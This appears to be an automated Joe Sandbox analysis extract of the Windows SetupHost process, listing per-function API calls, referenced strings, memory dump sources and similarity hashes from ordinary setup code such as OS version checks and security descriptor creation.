                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00A12740,0000003C,00A027B4), ref: 00A01FCA
                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00A027B4,?,00000001,00A12740,0000003C,00A027B4), ref: 00A01FEF
                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02010
                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02031
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32(00000008,00000001,00A12740,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02047
                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A0204E
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000001,00A12740,0000003C,00A027B4), ref: 00A02058
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00A12740,?,00000001,00A12740,0000003C,00A027B4), ref: 00A0206F
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02076
                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00A12740,00000001(TokenIntegrityLevel),00000000,00000000,00000001,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02098
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000001,00A12740,0000003C,00A027B4), ref: 00A020A6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000001,?,00000001,00A12740,0000003C,00A027B4), ref: 00A020BA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A020C1
                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00A12740,00000001(TokenIntegrityLevel),00000000,00000001,00000001,?,00000001,00A12740,0000003C,00A027B4), ref: 00A020E1
                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A020F1
                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,?,00000001,00A12740,0000003C,00A027B4), ref: 00A020FC
                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(0000003C,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02107
                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(00A027B4,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02112
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02123
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A0212A
                                                                                                                                                                                                                • InitializeAcl.ADVAPI32(00000000,?,00000002,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02143
                                                                                                                                                                                                                • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,00A027B4,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02158
                                                                                                                                                                                                                • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,0000003C,?,00000001,00A12740,0000003C,00A027B4), ref: 00A0216D
                                                                                                                                                                                                                • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C0110000,?,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02182
                                                                                                                                                                                                                • EqualSid.ADVAPI32(?,00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02191
                                                                                                                                                                                                                • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A021A5
                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A021B6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A021DF
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A021E6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$InitializeProcess$AccessAllowedLengthToken$Allocate$AllocCurrentDescriptorErrorInformationLastOpenSecurityThread$DaclEqualFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 719363623-0
                                                                                                                                                                                                                • Opcode ID: d7fbdecfbe0247446a47d38ce2a6a638f9577e43d94fd6306db5c5daeaa88b4e
                                                                                                                                                                                                                • Instruction ID: dda414bba10ed891e1fd1fbf4972f4d1fc3334864ef92b65a463943561ccaba6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7fbdecfbe0247446a47d38ce2a6a638f9577e43d94fd6306db5c5daeaa88b4e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7610B75A00308AFEB21DFE5ED49BEEBABDBF08750F149119F605E21E0D77199428B20
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A00CCF
                                                                                                                                                                                                                • FormatMessageW.KERNEL32(00000900,00000000,00000400,00000000,00000000,?), ref: 00A00D24
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A00D55
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A00D5C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,ConstructPartialMsgVW: MALLOC failed,?), ref: 00A00DA8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A00DAF
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,ConstructPartialMsgVW: MALLOC failed,?), ref: 00A00DBE
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 00A00DD2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorFreeLastProcess$AllocFormatLocalMessage
                                                                                                                                                                                                                • String ID: ConstructPartialMsgVW: MALLOC failed$Log: Failed To Get Msg From ID
                                                                                                                                                                                                                • API String ID: 804065711-4092388093
                                                                                                                                                                                                                • Opcode ID: d6e7631830d8b7b6f03d073f4d121e3538b525ca80023de76d36f5cc40d94d9a
                                                                                                                                                                                                                • Instruction ID: a4a8f3a0160a1d4fd616fa6c82182db67e927ff026d7f6a61e4544e8f0605cdf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6e7631830d8b7b6f03d073f4d121e3538b525ca80023de76d36f5cc40d94d9a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1031AF35604709ABDB11DFE8EC45FEE7BBAEB88341F148528F905D6290E7709D01CB60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BE595: _vsnwprintf.MSVCRT ref: 009BE5C7
                                                                                                                                                                                                                • RegGetValueW.KERNEL32(80000002,?,ETag,00000002,00000000,00000000,00000000), ref: 00A0A260
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-0000001E,?,?,?,00000001,00000000,00000000), ref: 00A0A28C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00000001,00000000,00000000), ref: 00A0A293
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 00A0A30E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 00A0A315
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFreeValue_vsnwprintf
                                                                                                                                                                                                                • String ID: %ls\%ls\%ls$ETag
                                                                                                                                                                                                                • API String ID: 4126488486-4233363893
                                                                                                                                                                                                                • Opcode ID: 989f2d85a39138b11d689bef8f68a5ea44d930cfe97960c708ea5a25bc92fadc
                                                                                                                                                                                                                • Instruction ID: 4eadd787e8f6ae222246a9f1010c36aff99226ac281e870c0a524761731a317f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 989f2d85a39138b11d689bef8f68a5ea44d930cfe97960c708ea5a25bc92fadc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F31C67694032C6BCB21DB94DC4CFEB77BCEB98710F1141A5F909AB281DA709D418BA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057), ref: 009BE47A
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE660
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE676
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6C3
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6DB
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,02000000,00000000), ref: 009BE405
                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 009BE430
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009BE43A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009BE44C
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009BE454
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009BE45F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BE466
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009BE46D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap_wcsnicmp$CloseControlCreateDeviceFileFreeHandleProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2742103690-0
                                                                                                                                                                                                                • Opcode ID: 80d13913bc0364561e107a7250e7969e1adeb2cfd4b46ed64a6a4e647a097b76
                                                                                                                                                                                                                • Instruction ID: 9c8fb6199956cf2e977780ce349c8d2202966d64e26cd45cbb86655d4a8bbe63
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80d13913bc0364561e107a7250e7969e1adeb2cfd4b46ed64a6a4e647a097b76
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8111E171604204BBE7109BF59D48FEF7BBDEBC4720F14C958F912E61A0D6744D029624
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,WdsSetupLogInit,00000000), ref: 009C118B
                                                                                                                                                                                                                • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 009C11A0
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009C11AF
                                                                                                                                                                                                                • FreeSid.ADVAPI32(?), ref: 009C11BA
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009C11C2
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009C11CB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                • String ID: WdsSetupLogInit
                                                                                                                                                                                                                • API String ID: 1125035699-3317556560
                                                                                                                                                                                                                • Opcode ID: 3c63f0f170f34ee42cf7ae8da8d99c3abd1fc8a68bcd0fb9ca5baeeccab17adf
                                                                                                                                                                                                                • Instruction ID: c79eb5a819b05b85d475e5565cf80c8a723a55ebf59a3bd3359675d6fa66ff1a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c63f0f170f34ee42cf7ae8da8d99c3abd1fc8a68bcd0fb9ca5baeeccab17adf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D110C74E04219AFEB00DFA0DC88ABEBBB8FB09354F145569E902E2291D7349E058B65
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FE4D9
                                                                                                                                                                                                                • RtlGetVersion.NTDLL ref: 009FE4EE
                                                                                                                                                                                                                  • Part of subcall function 009B9CA1: GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?,?,?,?,00000000,?,009A7B5C), ref: 009B9CD7
                                                                                                                                                                                                                  • Part of subcall function 009B9CA1: GetLastError.KERNEL32(?,?,?,00000000,?,009A7B5C), ref: 009B9CE1
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000), ref: 009FE537
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • base\ntsetup\conx\common\setuplib\src\osinfo.cpp, xrefs: 009FE54E
                                                                                                                                                                                                                • Host OS version: %u.%u.%u.%u %s (%hu.%hu) Platform 0x%X, SuiteMask 0x%hX, ProdType 0x%hX, xrefs: 009FE590
                                                                                                                                                                                                                • ConX::Setup::Common::COSInfoHelper::GetHostOSVersion, xrefs: 009FE549
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$HandleModuleVersionmemset
                                                                                                                                                                                                                • String ID: ConX::Setup::Common::COSInfoHelper::GetHostOSVersion$Host OS version: %u.%u.%u.%u %s (%hu.%hu) Platform 0x%X, SuiteMask 0x%hX, ProdType 0x%hX$base\ntsetup\conx\common\setuplib\src\osinfo.cpp
                                                                                                                                                                                                                • API String ID: 872402777-2280374826
                                                                                                                                                                                                                • Opcode ID: b700466a65b1804c12e51871b7f4b47a849be2ed8772a36f2c5a47cd11e7aa9f
                                                                                                                                                                                                                • Instruction ID: 7c7d378a09f6c40ab9e098e7b7dbdece32f217c75bcd2c54d96a69e853ac57d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b700466a65b1804c12e51871b7f4b47a849be2ed8772a36f2c5a47cd11e7aa9f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2316FB1608315ABDB20DF65D905ABFBBE8FFC8715F00491DF98886290E774D905CBA2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,00000000), ref: 009FDCA1
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 009FDCA8
                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32 ref: 009FDCC0
                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?), ref: 009FDCC4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                • API String ID: 3433367815-192647395
                                                                                                                                                                                                                • Opcode ID: d3caa7e6810705f5cc904518cdfdd0da8f4a8048b34ffde90a79d3d5987d7c0a
                                                                                                                                                                                                                • Instruction ID: f5f46c27239f4ac2be1fe77845b78111ad486794ad826f4f035b973aaa712ef5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3caa7e6810705f5cc904518cdfdd0da8f4a8048b34ffde90a79d3d5987d7c0a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAF0507264620893CB22636C6D0DAFF36AEE784709F144913FB83D50C0DAD0CC42C3A2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InformationPower
                                                                                                                                                                                                                • String ID: CSystemHelper::CheckConnectedStandby$SetupUI: Connected standby: [%s]$SetupUI: Detecting connected standby capability...$Yes
                                                                                                                                                                                                                • API String ID: 33107167-1862664920
                                                                                                                                                                                                                • Opcode ID: 394770d1dafdc179809fd9aacff2ec7a296e4ad0d3e85757590aa8f734ffe453
                                                                                                                                                                                                                • Instruction ID: 445318d98cead979fc11a5e4af18dd05e7f52ff3e58f54c2a15c5b7cea50f6e4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 394770d1dafdc179809fd9aacff2ec7a296e4ad0d3e85757590aa8f734ffe453
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD3177B1704214ABDF05A7B88C5EB6DBBB9DFC8720F04805AF9069B391DE749D02C7A5
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NtQueryLicenseValue.NTDLL(00A13190,00000000,00000000,00000004,00000000), ref: 00A0B320
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • ConfigureTelemetryOptInSettingsUx, xrefs: 00A0B2AB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LicenseQueryValue
                                                                                                                                                                                                                • String ID: ConfigureTelemetryOptInSettingsUx
                                                                                                                                                                                                                • API String ID: 22271514-4247868660
                                                                                                                                                                                                                • Opcode ID: 0bf2025768b57f974fa02d930b0585d73919f64183704c554ecfa737c62c2243
                                                                                                                                                                                                                • Instruction ID: 0c0b6373d84d1626ccfd14a89d63c3209d081234866767dd4a7ebdd1beeb0947
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bf2025768b57f974fa02d930b0585d73919f64183704c554ecfa737c62c2243
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E21AC7191021EABDB21CF98D9547EEB7F4EB48310F100879D551A62C0E7B09A84CF61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Library$AddressFreeLicenseLoadProcQueryValue
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3617071427-0
                                                                                                                                                                                                                • Opcode ID: 935143acef5bb5f3d5bc5c1a0f7eb502b535f137f2d48d41098ccf2a257a4be4
                                                                                                                                                                                                                • Instruction ID: eff2b563632ed46677b2913e4a06121b5c4f2c0fc9509fce5b72cde5e21e3ed2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 935143acef5bb5f3d5bc5c1a0f7eb502b535f137f2d48d41098ccf2a257a4be4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5021B471F1830CBBDB208B94E5547EDBBF4AB54740F14406AD841A72D1E7B58E89C761
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
